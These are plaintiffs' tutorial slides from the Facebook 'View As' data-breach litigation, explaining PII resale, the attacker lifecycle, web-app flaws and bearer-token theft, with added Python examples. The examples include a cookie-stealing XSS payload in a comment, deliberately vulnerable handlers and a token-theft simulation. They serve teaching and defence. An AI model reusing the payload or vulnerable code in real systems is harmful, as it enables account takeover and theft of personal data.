Echavarria, et al. v. Facebook, Inc., 3:18-cv-05982-WHA (and all related cases)
Plaintiffs’ Tutorial, January 9, 2019
2019 – Plaintiffs’ Tutorial in 3:18-cv-05982-WHA (and all related cases) 1


Introduction
• Plaintiffs’ Counsel
  • Morgan & Morgan, P.A. Complex Litigation Group
  • Cohen Milstein Sellers & Toll PLLC
  • Milberg Tadler Phillips Grossman LLP
• Retained Experts
  • Mary T. Frantz will discuss: PII, its Value, and Basic Security Against Hacking
  • Matt B. Strebe will discuss: Authentication, Access Tokens, and Hacking Tokens
• Some questions moving forward


PII, Its Value, and Basic Security Against Hacking

• Mary Frantz
  • Over 28 years of experience in cybersecurity, corporate enterprise technology architecture, and identity and access management
  • CEO of Enterprise Knowledge Partners, LLC
  • Has served as an expert witness in several data breach cases
  • Certified Ethical Hacker, Penetration Tester, Information Systems Auditor
  • CV provided for the Court and counsel


Personally Identifiable Information (PII)
• General Definition and California CalOPPA
  • PII defined (California Online Privacy Protection Act (CalOPPA), Cal. Bus. & Prof. Code Sec. 22577(a)): details collected on the Internet about an individual consumer, including an individual’s first and last name, a physical street address, an email address, a telephone number, a Social Security number, or any other information that permits a specific individual to be contacted physically or online.
• Compromised PII has two major types
  • Temporary or “changeable” information – short shelf life. Examples: passwords, credit card numbers, bank accounts, driver’s license, email, phone numbers
  • Historical or “unchangeable” information – long or infinite shelf life. Examples: original images/photos, passport numbers, current and previous addresses, mother’s maiden name, relationships (family, contacts, challenge-response questions), education, birth date, SSN, employment history, earnings and net worth, health history, purchase history, product designs, online comments, signed documents


PII – Value
• Aggregated Profiles or Fullz
  • Fullz – complete “packages” of information
  • Combination of historical and temporary information
  • Highest value – Fullz aggregated with behavioral and personality profile descriptors: opinions, contacts, family members, style and event choices, online and physical locations visited, interests (for example: music, movies, colors, auto purchases, and sites visited), “changeable” and “unchangeable” information
  • Confidential corporate information and IP, customer complaints, confidential electronic communication
• Value of PII
  • Validated and/or recently updated Fullz PII = higher street price per profile
  • Fullz is highly coveted by nation states, “phishers,” malicious hackers, and spammers
  • Neural-marketing: the process of mining Fullz for targeted influence and manipulation
  • Collection and mining of Fullz has been used by nation state clandestine operations


PII – Darknet and Dark Web
• Darknet
  • System of routers and relay devices that are not indexed or directly accessible
  • All communication between the relays uses encryption
  • Cannot access the Darknet using standard internet browsers; must know the exact address or use Dark Web browsers
• Dark Web
  • A subset of the Darknet that serves web content over HTTP (the slide’s “HTML”: ordinary web pages, reached only through the Darknet)
  • Web services and specific browsers are required to access the Darknet
  • Built upon anonymous browsing
  • Specific, anonymous services available: messaging, email, file-sharing sites


PII – How It Is Misused
• Big data repositories created from compromised and legitimate PII on the Darknet
  • Combined and blended as needed
  • Sold off in pieces for continued revenue streams
  • Pieces sold rarely equate to exact copies of stolen data (obfuscates source and trail)
  • Complete Fullz NOT usually found or sold on Darknet auction sites
• Use of the Dark Web for selling stolen data
  • “Changeable” information often sold on sales or auction sites; currency is BTC
  • Pieces of Fullz are sold on sales or auction sites, usually copies (not original), with diminished value
  • Complete Fullz sales use private messaging, secure email, burner phones


Typical Targeting Attacker Lifecycle (not all phases are used or needed; the process is not linear)

Standard Attacker Lifecycle (phases in the diagram): Reconnaissance; Scanning and Penetration; Attempt Access; Establish Foothold; Establish Persistence; Exfiltrate; Eliminate intrusion evidence

Activities across the phases:
• Perform physical and logical reconnaissance (website, employees, physical sites, etc.)
• Use web crawlers/spiders, NMAP
• Vulnerability scan
• Register as a developer and gain insights
• Test possible vulnerabilities; learn from error messages/responses
• Test access – see what works, what doesn’t, and why
• Access and create “backdoors”
• Open up ports
• Harvest and/or elevate credentials (impersonate real user and service accounts)
• Root
• Delete evidence as they go (advanced), timestomp
• Exfiltrate
• Leave backdoors
• Delete logs
• May sell or share the vulnerability to script kiddies to cover tracks, create noise (cause chaos)
• Come back after the noise calms down, or use the noise as cover
• Watch for reactions, method of remediation

High Level Hacker Lifecycle
• Advanced attackers do not want to get caught; they maximize “time on target”
• “Script kiddies” are not advanced; they often make noise that is [sometimes] easily detected


Sample Crawl or Spider
• Using a free tool provided by OWASP called “ZAP” (Zed Attack Proxy)
• Finds/crawls all URLs and calls being used by the application during each step of a process
• Look for exposed information in the captured requests and responses, including cookies, tokens, login credentials, infrastructure info, etc.
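The last step above, reading what the spider captured and flagging credentials left in the page, as an added example. This is not part of the tutorial and is not ZAP’s own code; it is a stand-alone checker over raw HTTP responses. The two sample responses are constructed, and the token patterns are assumptions about common formats, not a description of any real site.

```python
"""Offline check of crawled HTTP responses for credentials left in the page.

Added example: not part of the tutorial and not ZAP's code. The sample
responses are constructed; the token patterns are assumed common shapes.
"""
import re
from dataclasses import dataclass

# Assumed shapes in which bearer credentials tend to appear in HTML/JS/JSON bodies.
TOKEN_PATTERNS = [
    re.compile(r"access_token=([A-Za-z0-9._\-]{16,})"),
    re.compile(r'"(?:access_token|accessToken|token)"\s*:\s*"([A-Za-z0-9._\-]{16,})"'),
    re.compile(r"Bearer\s+([A-Za-z0-9._\-]{16,})"),
]
REQUIRED_COOKIE_ATTRS = ("httponly", "secure", "samesite")


@dataclass
class Finding:
    url: str
    kind: str      # "token" or "cookie"
    detail: str


def parse_response(raw: str):
    """Split a raw HTTP/1.1 response into status line, header pairs and body.
    Headers are kept as a list because Set-Cookie may legitimately repeat."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    headers = []
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers.append((name.strip().lower(), value.strip()))
    return lines[0], headers, body


def audit_cookies(url, headers):
    """Flag Set-Cookie headers missing the attributes that keep a session cookie
    away from script (HttpOnly), off plaintext links (Secure) and off
    cross-site requests (SameSite)."""
    findings = []
    for name, value in headers:
        if name != "set-cookie":
            continue
        cookie_name = value.split("=", 1)[0]
        attrs = {a.strip().split("=")[0].lower() for a in value.split(";")[1:]}
        missing = [a for a in REQUIRED_COOKIE_ATTRS if a not in attrs]
        if missing:
            findings.append(Finding(url, "cookie", f"{cookie_name}: missing {', '.join(missing)}"))
    return findings


def audit_body(url, body):
    """Flag anything that looks like a bearer token in the body: a token in
    served HTML/JS is readable by any script on the page and ends up in
    caches, proxies and referrers."""
    findings = []
    for pat in TOKEN_PATTERNS:
        for m in pat.finditer(body):
            tok = m.group(1)
            findings.append(Finding(url, "token", f"bearer-like value in body: {tok[:4]}...{tok[-4:]}"))
    return findings


def audit(url, raw_response):
    _, headers, body = parse_response(raw_response)
    return audit_cookies(url, headers) + audit_body(url, body)


# Constructed captures standing in for two pages a spider visited. Not real traffic.
SAMPLES = {
    "https://app.example.test/home": (
        "HTTP/1.1 200 OK\r\n"
        "Content-Type: text/html\r\n"
        "Set-Cookie: session=abc123; Path=/\r\n"
        "\r\n"
        '<html><script>window.__state={"accessToken":"EAAB0123456789abcdefXYZ"};</script>'
        '<a href="/profile?access_token=EAAB0123456789abcdefXYZ">me</a></html>'
    ),
    "https://app.example.test/settings": (
        "HTTP/1.1 200 OK\r\n"
        "Content-Type: text/html\r\n"
        "Set-Cookie: session=abc123; Path=/; HttpOnly; Secure; SameSite=Lax\r\n"
        "\r\n"
        "<html><form action='/settings' method='post'>...</form></html>"
    ),
}


def audit_all(samples=SAMPLES):
    """Run the audit over every captured page; returns {url: [Finding, ...]}."""
    return {url: audit(url, raw) for url, raw in samples.items()}


if __name__ == "__main__":
    for url, findings in audit_all().items():
        for f in findings:
            print(f"{f.kind:6} {url} {f.detail}")
```

The home page yields three findings (a session cookie without HttpOnly/Secure/SameSite, and the same token once in inline script state and once in a link), the settings page none. In practice the same logic is pointed at a ZAP session export or proxy log rather than the inline samples.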


Typical Targeting Attacker Lifecycle (not all phases are used or needed; the process is not linear)

Standard Attacker Lifecycle (phases in the diagram): Reconnaissance; Scanning and Penetration; Attempt Access; Establish Foothold; Establish Persistence; Exfiltrate; Eliminate intrusion evidence

Defensible Posture and Cyber Resilience (Typical Corporate Cyber Threat Mitigation, drawn against the attacker phases, each measure feeding back to “inform & improve” the others): External Threat Intelligence; Self Reconnaissance; External Vulnerability Scanning; Harden/Isolate Environments; Logging/Monitoring; Internal Vulnerability Scanning; Secure Application Development/Testing; Third Party Assessments; Threat Mitigation; Threat Remediation; Bug Bounty Programs

High Level Security Lifecycle
• Emulate attacker/black hat reconnaissance, scanning and pen testing
• Monitor the darknet for chatter about attacks, data dumps
• Monitor and log for anomalous behavior
• Constant vulnerability testing using the latest signatures
• Security test/code review new releases; regression test existing software/code services/web/data stores/apps/containers
• Harden devices/services
• Constant training/updating
• Periodic live testing of the IR plan
• Security Posture Assessments
• Red Team/Blue Team exercises
• Third party audits, internal audits
• Third party testing via bug bounty

Corporate Owners
• CISO, Compliance Officer, General Counsel
• Security Architecture
• SOC


Securing Databases
• Generally, two types of databases – structured (relational, SQL) and unstructured (NoSQL)
• Many NoSQL stores ship without default audit trails and with little built-in security enabled; authentication, authorization and auditing must be switched on and configured deliberately
• Encrypting storage may cause unacceptable latency, but an organization can encrypt tiers based upon last access date, age of data, and other qualifiers
• Best practice for NoSQL is a combination of the following:
  • Strong multi-factor authentication and authorization
  • Strong perimeter network and isolation
  • Change default ports (reduces exposure to untargeted scans; not a substitute for authentication)
  • Segmentation of access rights (gateways)
  • Time-based access controls
  • Disallow concurrent access
  • Input and extract validation
  • Audit or log all plugin access (trusted and untrusted) and server logs, and control access to the logs
  • Replication and data segmentation, key structures
  • Strong encryption where possible


Securing Web Apps
• OWASP (Open Web Application Security Project)
  • Globally recognized non-profit for web application security best practices and standards
  • Industry standard:
    • Test for the OWASP Top 10 security risks for web applications
    • Open source vulnerability scanning software
    • Software Assurance Maturity Model (SAMM)
    • Open source tools and resources – testing tools, best practice code
  • Accepted as the standard for web-based applications by most organizations
• OWASP critical threats and penetration testing methods
  • Cross-Site Scripting (XSS): enables attackers to inject client-side scripts that run in the victim’s browser inside the site’s own origin, so the same-origin policy no longer keeps the attacker out, and to steal tokens and cookies that are visible to script
  • Cross-Site Request Forgery (CSRF, also written XSRF)
  • Broken Access Control
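The three OWASP issues just listed, each as a vulnerable handler next to its hardened form, as an added example. This is not code from the tutorial, from OWASP, or from any real application; the request dicts, session store and photo table are constructed stand-ins for a web framework’s objects, and every name in it is an assumption.

```python
"""XSS, CSRF and broken access control: vulnerable handler beside the fix.

Added example, not from the tutorial or OWASP. Sessions, forms and the photo
table are constructed stand-ins for a web framework; all names are assumed.
"""
import hmac
import html
import secrets

# ---- Cross-Site Scripting (XSS): untrusted text written into HTML ----------

def render_comment_vulnerable(comment: str) -> str:
    # A comment such as <script>fetch('//evil/?c='+document.cookie)</script>
    # runs in every reader's browser, inside this site's origin.
    return f"<p class='comment'>{comment}</p>"


def render_comment_safe(comment: str) -> str:
    # Output encoding for the HTML text context: rendered as text, never parsed as markup.
    return f"<p class='comment'>{html.escape(comment, quote=True)}</p>"


# ---- Cross-Site Request Forgery (CSRF): state change on the cookie alone ----

SESSIONS = {}   # session id -> server-side session record


def new_session(user: str) -> str:
    sid = secrets.token_urlsafe(32)
    SESSIONS[sid] = {"user": user, "csrf": secrets.token_urlsafe(32), "email": None}
    return sid


def change_email_vulnerable(session_id: str, form: dict) -> bool:
    # The browser attaches the session cookie to a form POST from any site,
    # so a page the victim merely visits can submit this request for them.
    SESSIONS[session_id]["email"] = form["email"]
    return True


def change_email_safe(session_id: str, form: dict) -> bool:
    # Require a per-session secret that a cross-origin page cannot read,
    # compared in constant time so the check itself leaks nothing.
    sess = SESSIONS[session_id]
    supplied = form.get("csrf", "").encode()
    if not hmac.compare_digest(supplied, sess["csrf"].encode()):
        return False
    sess["email"] = form["email"]
    return True


# ---- Broken Access Control: object id taken straight from the request ------

PHOTOS = {
    101: {"owner": "alice", "data": "alice-private-photo-bytes"},
    102: {"owner": "bob", "data": "bob-private-photo-bytes"},
}


def get_photo_vulnerable(session_id: str, photo_id: int):
    # Authenticated is not authorized: any logged-in user can walk the ids.
    SESSIONS[session_id]                     # only proves the caller is logged in
    photo = PHOTOS.get(photo_id)
    return photo["data"] if photo else None


def get_photo_safe(session_id: str, photo_id: int):
    # Authorize against the owner recorded server-side, not against the request.
    user = SESSIONS[session_id]["user"]
    photo = PHOTOS.get(photo_id)
    if photo is None or photo["owner"] != user:
        return None                          # same answer for "missing" and "not yours"
    return photo["data"]


if __name__ == "__main__":
    sid = new_session("alice")
    print(render_comment_safe("<script>alert(1)</script>"))
    print(change_email_safe(sid, {"email": "a@example.test"}))            # no CSRF token
    print(get_photo_vulnerable(sid, 102), get_photo_safe(sid, 102))       # bob's photo
```

The hardened CSRF handler still needs the cookie itself to carry SameSite and HttpOnly, and the access-control fix only works because ownership is looked up from server-side state rather than a field the client could rewrite.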


Authentication, Access Tokens, and Hacking Tokens

• Matt Strebe
  • Over 29 years of experience in the field of cybersecurity, database design and security, secure network protocols, and cryptography
  • CEO of Connetic IT Services & CeNRG cloud hosting
  • Has served as an expert witness in several data breach cases
  • Author of numerous books and publications, including Network Security Foundations & Firewalls 24x7
  • Inventor, “No Transfer” (NOTX) patented device authentication protocol
  • CV provided for the Court and counsel


Authentication

• Logging in
• Access to Private Resources
• Access Control Lists
• Sessions and Web Sessions
• Web site simultaneous access to multiple resources in a distributed web application
• Authentication and Authorization are different matters
• Here, it appears authentication is the issue, not encryption
• Large scale web applications typically use access tokens to solve distributed access control issues


Access Tokens
• Access Token
  • An access token is an object encapsulating the security identity of a process such as a web session. A token is used to make security decisions and to store tamper-proof information about some system entity. An access token is generated by the logon service when a user logs on to the system.
  • Bearer instrument example: court access key cards
  • Can contain anything the developer wants
  • An Access Token could be limited to a single purpose (master key v. bathroom key)
• Types of Tokens
  • User Access Token (short-term, long-term)
  • App Access Token
  • Refresh Token
• For Facebook
  • Here, it appears the token Facebook associated with the “View As” function gave the hacker the same access as the original user (e.g., key card)


How Tokens Are Transacted and Used
• Token portability (and theftability)
• They are protected
  • On Web servers by encryption at rest
  • In transit over the Internet by encryption in flight
  • On Web browsers by encryption at rest
• They are not necessarily protected in the running web browser
• Developers must be careful when sending Access Tokens to the web browser client, such that a token applies only to that user
• For the developer, a conscious trade-off between security and ease of use
• Expedited access requires constant vigilance upon implementation
• An access token should never be exposed to any other users in a running browser


OAuth 2.0

• OAuth 2.0 is an authorization protocol frequently used as an easier authentication protocol (authentication proper is layered on top of it by OpenID Connect)
• Used by companies like Facebook
• The access token supplants other authentication steps
• Allows third-party marketers some benefits
  • For example: a simple user experience to prevent “usage walls” and encourage adoption
• Adoption of OAuth 2.0


OAuth 2.0 – Vulnerabilities

• But OAuth 2.0 presents a greater risk of the “bearer instrument” being misused
• You don’t have to decrypt or comprehend an Access Token to use it
• When you find someone else’s Access Token in a web session, you have whatever level of access that token permits until it expires
• Ease of coding, code re-use, complex application design, and lack of testing lead to mistakes and increased risks to users’ PII


How Tokens Can Be Exploited
• Hackers determine that they can exploit a web site to obtain another user’s Access Token
• Hackers access the web site as each user, access PII, then identify and steal other available Access Tokens
• And repeat. Very quickly, hackers can obtain many millions of accounts’ Access Tokens with automated scripts (“crawling”)
• PII is taken, is in the possession of hackers, and is misused and/or sold
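The bearer-instrument point from the preceding slides (a token found in a page is usable by whoever holds it; a token can be cut down to a single purpose, master key versus bathroom key) and the theft loop above, carried through in code as an added example. This is not Facebook’s code and does not describe how its “View As” feature was actually implemented; it is a constructed model of a preview feature that embeds a token in the rendered page. The token format, scope names, HMAC scheme and signing key are all assumptions.

```python
"""Bearer tokens with and without a purpose limit, in a "view as" preview.

Added example: not Facebook's code and not a description of its
implementation. Token format, scopes, HMAC scheme and key are constructed.
"""
import base64
import hashlib
import hmac
import json
import time

SIGNING_KEY = b"constructed-server-side-signing-key"   # assumption: never leaves the server
FULL_ACCESS = {"read_profile", "read_messages", "post", "change_email"}


def _b64(data: bytes) -> bytes:
    return base64.urlsafe_b64encode(data).rstrip(b"=")


def _unb64(data: bytes) -> bytes:
    return base64.urlsafe_b64decode(data + b"=" * (-len(data) % 4))


def mint(subject, scopes, ttl=3600, audience=None, now=None):
    """Issue a signed bearer token: whoever presents it gets `scopes` on `subject`."""
    now = int(time.time()) if now is None else now
    payload = {"sub": subject, "scope": sorted(scopes), "exp": now + ttl}
    if audience is not None:
        payload["aud"] = audience            # the session this token was issued to
    body = _b64(json.dumps(payload, separators=(",", ":")).encode())
    sig = _b64(hmac.new(SIGNING_KEY, body, hashlib.sha256).digest())
    return (body + b"." + sig).decode()


def verify(token, now=None):
    """Payload if the signature is valid and the token is unexpired, else None."""
    now = int(time.time()) if now is None else now
    parts = token.encode().split(b".")
    if len(parts) != 2:
        return None
    body, sig = parts
    expected = _b64(hmac.new(SIGNING_KEY, body, hashlib.sha256).digest())
    if not hmac.compare_digest(expected, sig):
        return None
    payload = json.loads(_unb64(body))
    return payload if payload["exp"] > now else None


def authorize(token, action, resource_owner, presenter=None, now=None):
    """Server-side check. A bearer token lets the server test only the token's
    own claims: subject, scope, expiry and, if present, audience. Nothing here
    proves the presenter is the person the token was issued to."""
    p = verify(token, now)
    if p is None or p["sub"] != resource_owner or action not in p["scope"]:
        return False
    if "aud" in p and p["aud"] != presenter:
        return False                          # issued to a different session
    return True


def view_as_vulnerable(viewer_token, target, now=None):
    """Render 'what target sees' by minting a full-access token FOR TARGET and
    embedding it in the page sent to the viewer: the master key in the page."""
    if verify(viewer_token, now) is None:
        return None
    return {"html": "<div>preview</div>", "embedded_token": mint(target, FULL_ACCESS, now=now)}


def view_as_safe(viewer_token, target, now=None):
    """Same feature, single-purpose token: read-only preview of target's public
    profile, five-minute life, bound to the viewer's own session (the bathroom key)."""
    viewer = verify(viewer_token, now)
    if viewer is None:
        return None
    preview = mint(target, {"preview_public_profile"}, ttl=300, audience=viewer["sub"], now=now)
    return {"html": "<div>preview</div>", "embedded_token": preview}


def token_theft_outcome(view_as, now=None):
    """'attacker' previews 'victim', pulls the token out of the page (as a crawl
    of the rendered HTML would) and presents it from their own session.
    Returns the actions on victim's account the extracted token allows."""
    attacker_token = mint("attacker", FULL_ACCESS, now=now)
    page = view_as(attacker_token, "victim", now=now)
    stolen = page["embedded_token"]
    return sorted(a for a in FULL_ACCESS | {"preview_public_profile"}
                  if authorize(stolen, a, "victim", presenter="attacker", now=now))


if __name__ == "__main__":
    print("vulnerable:", token_theft_outcome(view_as_vulnerable))
    print("safe:      ", token_theft_outcome(view_as_safe))
```

With the vulnerable preview the extracted token reads messages, posts and changes the e-mail address on the victim’s account; with the scoped one it can only do what the preview was for, and even that only from the session it was issued to. Repeating the loop over many targets is the “crawling” the slide describes, and the scoped token is what stops each iteration from yielding a usable key.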


Preliminary Questions
1. How was the “View As” token developed, and how were its security and functionality tested, prior to release?
   a) What process did Facebook use to test the “View As” feature prior to release?
   b) Where else was/is the token used?
   c) What Security Development (i.e. Secure SDLC) processes does Facebook use to test their software prior to release?
2. When did Facebook first detect the issue, and how?
3. When did Facebook identify the root cause of the issue, and how?
4. Any report done by Facebook or a third party?
5. How did Facebook determine the affected entities?
6. What steps did Facebook take to contain and remediate the issue?
